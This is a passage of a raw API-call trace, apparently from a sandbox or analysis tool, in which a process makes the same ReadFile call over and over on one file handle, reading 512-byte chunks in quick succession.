[0225.935] ReadFile 
(in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.935] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.935] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.935] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.936] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.936] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.936] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.936] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.936] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 
[0225.936] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.936] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.936] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.937] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.937] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.937] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.937] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.937] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.937] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, 
lpOverlapped=0x0) returned 1 [0225.937] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.937] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.938] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.938] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.938] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.938] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.938] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.938] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.938] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, 
lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.938] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.939] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.939] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.939] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.939] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.939] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.939] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.939] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.939] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: 
lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.939] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.940] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.940] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.940] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.940] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.940] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.940] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.940] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.940] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, 
lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.941] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.941] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.941] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.941] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.941] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.941] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.941] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.941] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.942] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.942] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.942] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.942] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.942] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.942] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.942] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.943] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.943] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.943] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.943] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.943] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.943] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.943] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.943] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.944] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.944] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.944] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.944] ReadFile (in: hFile=0x58, 
lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.944] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.944] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.944] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.944] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.945] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.945] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.945] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.945] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.945] ReadFile 
(in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.945] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.945] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.945] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.946] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.946] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.946] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.946] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.946] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 
[0225.946] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.946] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.946] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.947] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.947] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.947] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.947] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.947] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.947] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, 
lpOverlapped=0x0) returned 1 [0225.947] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.947] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.947] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.948] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.948] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.948] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, 